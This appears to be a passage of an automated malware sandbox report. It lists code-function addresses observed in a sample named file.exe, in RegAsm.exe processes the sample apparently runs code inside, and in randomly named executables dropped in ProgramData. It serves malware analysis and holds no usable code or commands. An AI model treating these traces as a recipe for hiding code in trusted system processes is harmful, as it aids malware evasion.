Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	4_2_6C0EB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C08F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00950C40	0_2_00950C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042D933	4_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042D1C3	4_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041C472	4_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042D561	4_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041950A	4_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042DD1B	4_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042CD2E	4_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041B712	4_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0835A0	4_2_6C0835A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0FAC00	4_2_6C0FAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C5C10	4_2_6C0C5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0D2C10	4_2_6C0D2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F542B	4_2_6C0F542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C095440	4_2_6C095440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F545C	4_2_6C0F545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C096C80	4_2_6C096C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0E34A0	4_2_6C0E34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0EC4A0	4_2_6C0EC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0964C0	4_2_6C0964C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0AD4D0	4_2_6C0AD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08D4E0	4_2_6C08D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C6CF0	4_2_6C0C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C09FD00	4_2_6C09FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0B0512	4_2_6C0B0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0AED10	4_2_6C0AED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C0DD0	4_2_6C0C0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0E85F0	4_2_6C0E85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0D5600	4_2_6C0D5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C7E10	4_2_6C0C7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0E9E30	4_2_6C0E9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0D2E4E	4_2_6C0D2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0A4640	4_2_6C0A4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0A9E50	4_2_6C0A9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C3E50	4_2_6C0C3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F6E63	4_2_6C0F6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08C670	4_2_6C08C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0EE680	4_2_6C0EE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0A5E90	4_2_6C0A5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0E4EA0	4_2_6C0E4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F76E3	4_2_6C0F76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08BEF0	4_2_6C08BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C09FEF0	4_2_6C09FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C099F00	4_2_6C099F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C7710	4_2_6C0C7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0D77A0	4_2_6C0D77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08DFE0	4_2_6C08DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0B6FF0	4_2_6C0B6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C097810	4_2_6C097810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0CB820	4_2_6C0CB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0D4820	4_2_6C0D4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0A8850	4_2_6C0A8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0AD850	4_2_6C0AD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0CF070	4_2_6C0CF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0B60A0	4_2_6C0B60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F50C7	4_2_6C0F50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0AC0E0	4_2_6C0AC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C58E0	4_2_6C0C58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0AA940	4_2_6C0AA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C09D960	4_2_6C09D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0DB970	4_2_6C0DB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0FB170	4_2_6C0FB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C5190	4_2_6C0C5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0E2990	4_2_6C0E2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08C9A0	4_2_6C08C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0BD9B0	4_2_6C0BD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C9A60	4_2_6C0C9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0FBA90	4_2_6C0FBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0822A0	4_2_6C0822A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0B4AA0	4_2_6C0B4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C09CAB0	4_2_6C09CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F2AB0	4_2_6C0F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0C8AC0	4_2_6C0C8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0A1AF0	4_2_6C0A1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0CE2F0	4_2_6C0CE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0CD320	4_2_6C0CD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C085340	4_2_6C085340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C09C370	4_2_6C09C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C08F380	4_2_6C08F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C0F53C8	4_2_6C0F53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C20AC30	4_2_6C20AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1F6C00	4_2_6C1F6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C13AC60	4_2_6C13AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C18ECD0	4_2_6C18ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C12ECC0	4_2_6C12ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B8D20	4_2_6C2B8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1FED70	4_2_6C1FED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C25AD50	4_2_6C25AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1C6D90	4_2_6C1C6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C134DB0	4_2_6C134DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BCDC0	4_2_6C2BCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C210E20	4_2_6C210E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1CEE70	4_2_6C1CEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1B6E90	4_2_6C1B6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C13AEC0	4_2_6C13AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C1D0EC0	4_2_6C1D0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C136F10	4_2_6C136F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C270F20	4_2_6C270F20
Source: C:\ProgramData\FBFHJJJDAF.exe	Code function: 7_2_00790C40	7_2_00790C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004103A8	12_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00447D38	12_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401000	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004480B0	12_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449120	12_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C1C0	12_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D250	12_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A231	12_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A230	12_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004012C7	12_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004452E0	12_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00415352	12_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407450	12_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00405470	12_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409402	12_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004404AB	12_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044A510	12_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004115B0	12_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041D610	12_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449620	12_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040A6E0	12_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040B6B0	12_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043F700	12_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041E71A	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044B720	12_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004087F0	12_2_004087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00428833	12_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004338C0	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004408E6	12_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004038A0	12_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434990	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040ABA0	12_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042EBBC	12_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437CD0	12_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00449D22	12_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00407E50	12_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427E6C	12_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437F30	12_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042DFE0	12_2_0042DFE0
Source: C:\ProgramData\FIEHIIIJDA.exe	Code function: 13_2_01110C40	13_2_01110C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE34CF0	16_2_1FE34CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE366C0	16_2_1FE366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE66E80	16_2_1FE66E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE5CE10	16_2_1FE5CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE4A560	16_2_1FE4A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE2D57C	16_2_1FE2D57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE51C50	16_2_1FE51C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE4BAB0	16_2_1FE4BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE2EA80	16_2_1FE2EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE2F160	16_2_1FE2F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE39000	16_2_1FE39000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE57810	16_2_1FE57810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFB16D0	16_2_1FFB16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFAFD50	16_2_1FFAFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF89CC0	16_2_1FF89CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF89430	16_2_1FF89430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFA33E0	16_2_1FFA33E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF9DB30	16_2_1FF9DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF8A2C0	16_2_1FF8A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFA61E0	16_2_1FFA61E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFB3920	16_2_1FFB3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFAD100	16_2_1FFAD100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF8F8D0	16_2_1FF8F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFD4FB2	16_2_1FFD4FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFB5F40	16_2_1FFB5F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FFFAEBE	16_2_1FFFAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_2001226A	16_2_2001226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_20019390	16_2_20019390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_20019A20	16_2_20019A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_20019F80	16_2_20019F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF0EE90	16_2_1FF0EE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF7E90	16_2_1FEF7E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEFEE20	16_2_1FEFEE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF0D10	16_2_1FEF0D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF2CF0	16_2_1FEF2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEB0C70	16_2_1FEB0C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE99C20	16_2_1FE99C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEEDB40	16_2_1FEEDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF24A60	16_2_1FF24A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF49A20	16_2_1FF49A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE99A10	16_2_1FE99A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF069C0	16_2_1FF069C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FE94970	16_2_1FE94970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF19950	16_2_1FF19950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FED5940	16_2_1FED5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF1A940	16_2_1FF1A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF3A900	16_2_1FF3A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF02870	16_2_1FF02870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FED9860	16_2_1FED9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF5E800	16_2_1FF5E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF4F790	16_2_1FF4F790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEB8760	16_2_1FEB8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEE9770	16_2_1FEE9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEDD6D0	16_2_1FEDD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEC9690	16_2_1FEC9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEBE630	16_2_1FEBE630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEEE5C0	16_2_1FEEE5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF685A0	16_2_1FF685A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF1A590	16_2_1FF1A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF18520	16_2_1FF18520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF37510	16_2_1FF37510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF424C0	16_2_1FF424C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEFA470	16_2_1FEFA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF14440	16_2_1FF14440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEA2450	16_2_1FEA2450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FECB3A0	16_2_1FECB3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEB53B0	16_2_1FEB53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEC2390	16_2_1FEC2390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEB0350	16_2_1FEB0350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEEA330	16_2_1FEEA330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF1E2E0	16_2_1FF1E2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF19190	16_2_1FF19190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEA8120	16_2_1FEA8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF01129	16_2_1FF01129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF0110	16_2_1FEF0110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEDE0D0	16_2_1FEDE0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEF2090	16_2_1FEF2090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEFB040	16_2_1FEFB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF45040	16_2_1FF45040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF48030	16_2_1FF48030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FEEB020	16_2_1FEEB020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_1FF0D020	16_2_1FF0D020
